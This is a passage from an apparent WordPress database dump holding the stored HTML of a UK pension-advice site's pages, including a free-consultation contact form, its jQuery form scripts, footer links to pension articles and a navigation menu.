\'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-524ab776ede3a\" class=\"iphorm iphorm-form-1\" action=\"../pension-forecast/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"524ab776ede3a\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/pension-forecast/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"5581\"/><input type=\"hidden\" name=\"post_title\" value=\"Pension Forecast\"/><h3 class=\"iphorm-title\">Contact Investor London&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_524ab776ede3a\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_524ab776ede3a\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_524ab776ede3a\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_524ab776ede3a\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_524ab776ede3a\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_524ab776ede3a\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_524ab776ede3a_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_524ab776ede3a\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_524ab776ede3a\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_524ab776ede3a\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_524ab776ede3a\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_524ab776ede3a\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-524ab776ede3a script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n<script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n			<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\" title=\"What Does a Wealth Manager Do?\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/7-pension-release-rules/\" title=\"7 Pension Release Rules to consider – so YOU don’t lose out.\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n							<span class=\"post-date\">August 29, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/\" title=\"Pension Liberation – Good plan or bad scam?\">Pension Liberation – Good plan or bad scam?</a>&#13;\n							<span class=\"post-date\">July 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\" title=\"From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n							<span class=\"post-date\">July 2, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/\" title=\"Retirement Income. The Final Frontier.\">Retirement Income. The Final Frontier.</a>&#13;\n							<span class=\"post-date\">June 21, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Investor London</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">enquiries@equalitywalk.org.uk</a></p>&#13;\n		&#13;\n				<p class=\"web\">Web: <a href=\"/\">Investor London</a></p>&#13;\n				<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n			&#13;\n<script><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\".footer-nav a:last-child\").css(\'border-right\', \'none\');\r\n\r\n});\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\'.opl-widget-btn\').each(function(){\r\n		var $this = jQuery(this);\r\n		$this.click(function(e){\r\n			document.getElementById(\'opl-widget-submit\').submit();\r\n		});\r\n	});\r\n});\r\n]]></script><script><![CDATA[\r\n	jQuery(document).ready(function($){\r\n		var opl_topnav_w = $(\'#opl-top-nav\').outerWidth() + 20;\r\n		$(\'#opl-top-nav\').css({\r\n			\'width\' : opl_topnav_w + \'px\',\r\n		});\r\n	});\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-packed.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/imagesLoaded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.isotope.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.cycle.lite.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.hoverIntent.minified.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.eislideshow.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/froogaloop.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.placeholder.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.waypoint.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gauge.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.ddslick.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.infinitescroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','Start your FREE Pension Forecast Today with Equity SMART','Our pension forecast will provide a fast, easy and secure way to find out what your fund will look like in retirement. Get your FREE pension forecast today.','publish','closed','closed','','start-your-free-pension-forecast-today-with-equity-smart','','','2017-09-21 16:34:36','2017-09-21 16:34:36','',0,'http://www.equalitywalk.org.uk/start-your-free-pension-forecast-today-with-equity-smart',0,'page','',0),(89,1,'2017-09-21 16:34:36','2017-09-21 16:34:36','<body class=\"single single-post postid-5890 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children 